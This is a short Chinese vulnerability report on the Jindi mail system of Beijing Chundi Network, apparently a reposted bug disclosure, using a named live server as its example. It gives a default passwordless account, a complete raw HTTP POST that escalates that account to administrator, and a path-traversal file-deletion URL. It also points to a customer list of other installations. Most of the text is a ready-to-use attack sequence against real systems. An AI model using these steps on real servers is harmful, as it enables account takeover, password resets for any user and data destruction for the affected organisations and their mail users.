北京春笛网络信息技术服务有限公司邮箱系统默

北京春笛网络信息技术服务有限公司邮箱系统默认弱口令帐户+普通用户提权+任意帐户密码修改+任意文件删除

金笛邮件系统有大量客户，Check out http://www.mailer.com.cn/New%20Customers/index1.htm   下面，以http://mail.censoft.com.cn为例，作全程解说。 1.默认弱口令帐户 [用户名]nobody [密码]无密码 [域]root   2.普通用户提权 nobody是普通用户，提权，只需发送如下HTTP：  

POST http://mail.censoft.com.cn/tmw/211ede8H38f/mailmain?type=msaveuser Host: mail.censoft.com.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://mail.censoft.com.cn/tmw/211ede8H38f/left. jsp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 312 subtype=edit&username=nobody&domain=root&usertype=S&first_name=&password=nobody&enable=true&enable_smtp=true&enable_pop3=true&enable_imap4=true&enable_webaccess=true&max_mailbox_size=-1&max_mailbox_msgs=-1&fm_size=-1&telephone=&mobile=&postalcode=&country=&state_province=&city=&organiztion=&department=&address=

注：因为版本不同，有时需要在包中加入Cookie。    

再用密码nobody重新登陆。  

焕然一新。 3.任意帐户密码修改

管理员能修改任意用户密码，这种情况还是比较少见，也非常危险。 4.任意文件删除 http://mail.censoft.com.cn/tmw/211ede8H38f/maintbackup.jsp?filename=[文件相对路径]&subtype=del 需指出，filename参数可目录回溯，由于攻击者容易获知金笛邮件 系统 文件结构，故危害极大。

修复方案：

迅速通知客户。

查看更多关于北京春笛网络信息技术服务有限公司邮箱系统默的详细内容...